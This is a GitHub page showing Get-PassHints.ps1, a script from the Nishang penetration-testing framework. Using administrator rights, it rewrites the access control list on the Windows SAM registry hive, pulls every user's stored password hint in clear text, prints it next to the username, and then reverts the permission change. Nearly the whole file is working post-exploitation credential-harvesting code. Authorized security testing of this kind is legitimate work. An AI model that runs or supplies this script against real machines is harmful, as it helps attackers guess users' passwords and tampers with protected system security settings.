-
Notifications
You must be signed in to change notification settings - Fork 2.5k
/
Copy pathGet-PassHints.ps1
71 lines (60 loc) · 2.43 KB
/
Get-PassHints.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
function Get-PassHints {
<#
.SYNOPSIS
Nishang script which extracts password hint for users in clear text.
.DESCRIPTION
The script extracts password hints from SAM registry hive. The script needs Administrator privs to read SAM hive.
.EXAMPLE
PS > Get-PassHints
.LINK
http://www.labofapenetrationtester.com/2015/09/extracting-windows-users-password-hints.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()]
Param ()
#Set permissions to allow Access to SAM\SAM\Domains registry hive.
#http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
#From powerdump from SET
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
#Logic for extracting password hint
$users = Get-ChildItem HKLM:\SAM\SAM\Domains\Account\Users\
$j = 0
foreach ($key in $users)
{
$value = Get-ItemProperty $key.PSPath
$j++
foreach ($hint in $value)
{
#Check for users who have passwordhint
if ($hint.UserPasswordHint)
{
$username = Get-UserName($hint.V)
$passhint = ([text.encoding]::Unicode).GetString($hint.UserPasswordHint)
Write-Output "$username`:$passhint"
}
}
}
#Remove the permissions added above.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}